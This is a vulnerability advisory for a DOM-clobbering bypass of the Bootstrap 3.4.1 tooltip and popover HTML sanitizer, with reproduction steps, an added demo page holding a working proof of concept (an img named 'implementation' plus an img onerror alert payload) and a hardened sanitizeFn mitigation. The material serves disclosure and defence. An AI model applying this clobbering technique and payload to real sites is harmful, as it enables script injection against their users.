Bootstrap Cross-Site Scripting Vulnerability

Vulnerability

A cross-site scripting (XSS) vulnerability affects Bootstrap versions from 3.4.1 up to, but not including, 4.0.0. It lies in the HTML sanitizer that the Popover and Tooltip components apply to the title and data-content values when the html option is enabled. That sanitizer parses content with document.implementation.createHTMLDocument() and, if the lookup fails, returns the input unchanged instead of refusing it. An attacker who can place an element named implementation in the page (DOM clobbering) makes the lookup fail, so unsanitized HTML passes through and is inserted into the live document, where it executes.

Impact

Exploitation results in cross-site scripting: script supplied through a tooltip or popover runs in the victim's browser in the origin of the vulnerable page, with access to its DOM, to cookies readable by script, and to same-origin requests. The precondition is that the attacker already controls markup on the page (enough to add an element named implementation) as well as a title or data-content value that is rendered with the html option; the sanitizer bypass turns that otherwise neutralised HTML injection into script execution.

Reproduction

To reproduce this vulnerability, create an HTML page that loads jQuery and Bootstrap v3.4.1. Add an image element whose name attribute is implementation; because the document object resolves named elements ahead of its built-in properties, document.implementation now refers to this image and document.implementation.createHTMLDocument is undefined. Then add a button with data-toggle="tooltip" or data-toggle="popover", enable HTML content (data-html="true", since the sanitizer runs only for HTML content and plain-text tooltips are unaffected), and place unsanitized HTML in the title or data-content attribute. Initialise the plugin with .tooltip() or .popover(), as Bootstrap 3 tooltips and popovers are opt-in. When the button is hovered or clicked, the sanitizer hands the content back untouched and the injected markup executes, demonstrating the XSS vulnerability.

Remediation

Users can upgrade to Bootstrap 3.4.7 or later, or migrate to a currently supported major version of Bootstrap. For commercial support, HeroDevs offers a Never-Ending Support version of Bootstrap 3. Where an upgrade cannot be rolled out immediately, two interim controls limit exposure: keep the html option off (its default) wherever tooltip and popover content does not need markup, and, for the places that do, pass a sanitizeFn option that does not depend on document.implementation, since Bootstrap hands content to sanitizeFn before reaching its own sanitizer.
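The following page puts the reproduction steps and the sanitizeFn mitigation side by side. It is an added example and is not part of the original advisory or of Bootstrap's own code. It assumes local copies of jQuery 1.12.4 and Bootstrap 3.4.1 at the paths shown, uses a standard img onerror canary as the payload, and the names implementationIsClobbered, realImplementation, hardenedSanitize and the ALLOWED policy are this example's own choices, not Bootstrap API.

```html
<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Bootstrap 3.4.1 tooltip sanitizer bypass via DOM clobbering</title>
  <!-- Assumed local copies of jQuery and Bootstrap 3.4.1; adjust the paths. -->
  <link rel="stylesheet" href="bootstrap-3.4.1/css/bootstrap.min.css">
  <script src="jquery-1.12.4.min.js"></script>
  <script src="bootstrap-3.4.1/js/bootstrap.min.js"></script>
</head>
<body>
  <!-- Step 1 (attacker-controlled markup): Document resolves named elements ahead
       of its built-in properties, so document.implementation now refers to this
       <img> and document.implementation.createHTMLDocument is undefined. -->
  <img name="implementation" alt="">

  <!-- Step 2: a tooltip with the html option on (the sanitizer only runs for HTML
       content; text tooltips go through .text() and are not affected). The onerror
       payload is a standard XSS canary chosen for this example. -->
  <button id="vuln" type="button" class="btn btn-default" data-toggle="tooltip"
          data-html="true"
          title="&lt;img src=x onerror=&quot;alert('bypass: ' + document.domain)&quot;&gt;">
    Hover: default sanitizer (bypassed)
  </button>

  <!-- Same kind of payload, but this tooltip is initialised with a sanitizeFn below. -->
  <button id="safe" type="button" class="btn btn-default" data-toggle="tooltip"
          data-html="true"
          title="&lt;b&gt;kept&lt;/b&gt; &lt;img src=x onerror=&quot;alert('must not fire')&quot;&gt;">
    Hover: hardened sanitizeFn
  </button>

  <script>
    // Check: has document.implementation been clobbered by a named element?
    function implementationIsClobbered() {
      return !(document.implementation instanceof DOMImplementation);
    }

    // Fetch the genuine DOMImplementation through the Document.prototype getter.
    // Prototype accessors are not subject to named-element lookup, so this works
    // even when document.implementation itself has been clobbered.
    var realImplementation = Object.getOwnPropertyDescriptor(
      Document.prototype, 'implementation'
    ).get.call(document);

    // Allowlist for the example (assumed policy, deliberately smaller than
    // Bootstrap's default whiteList): element name -> permitted attributes.
    var ALLOWED = {
      B: [], I: [], EM: [], STRONG: [], P: [], BR: [], SPAN: [],
      IMG: ['src', 'alt', 'width', 'height']
    };
    // src may be http(s) or scheme-less; anything with another scheme
    // (javascript:, data:, ...) is dropped.
    var SAFE_SRC = /^(?:https?:|[^:]*$)/i;

    // Replacement sanitizer that never touches document.implementation.
    function hardenedSanitize(unsafeHtml) {
      // The created document has no browsing context: no scripts run, nothing loads.
      var doc = realImplementation.createHTMLDocument('sanitize');
      doc.body.innerHTML = unsafeHtml;
      var nodes = doc.body.querySelectorAll('*'); // static list
      // Walk in reverse document order so children are handled before their parents.
      for (var i = nodes.length - 1; i >= 0; i--) {
        var el = nodes[i];
        var allowedAttrs = ALLOWED[el.nodeName];
        if (!allowedAttrs) {               // element not on the allowlist: drop it
          el.parentNode.removeChild(el);
          continue;
        }
        for (var j = el.attributes.length - 1; j >= 0; j--) {
          var attr = el.attributes[j];
          var name = attr.name.toLowerCase();
          var drop = allowedAttrs.indexOf(name) === -1 ||
                     (name === 'src' && !SAFE_SRC.test(attr.value.trim()));
          if (drop) el.removeAttribute(attr.name);
        }
      }
      return doc.body.innerHTML;
    }

    console.log('document.implementation clobbered:', implementationIsClobbered());

    // Bootstrap 3 tooltips are opt-in, so initialise both buttons explicitly.
    $('#vuln').tooltip();                                 // built-in sanitizer: returns input unchanged here
    $('#safe').tooltip({ sanitizeFn: hardenedSanitize }); // sanitizeFn replaces the built-in path
  </script>
</body>
</html>
```

Open the page in a browser and hover each button: the first one fires the alert, the second renders the bold text with the img's onerror attribute removed. The same hardenedSanitize function can be passed to .popover({ sanitizeFn: ... }), and the implementationIsClobbered check is cheap enough to run at startup before any HTML-enabled tooltip or popover is initialised.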

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm
spread: 7.8
impact: 1.7
exploitability: 5.8
remediation: 7.7
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.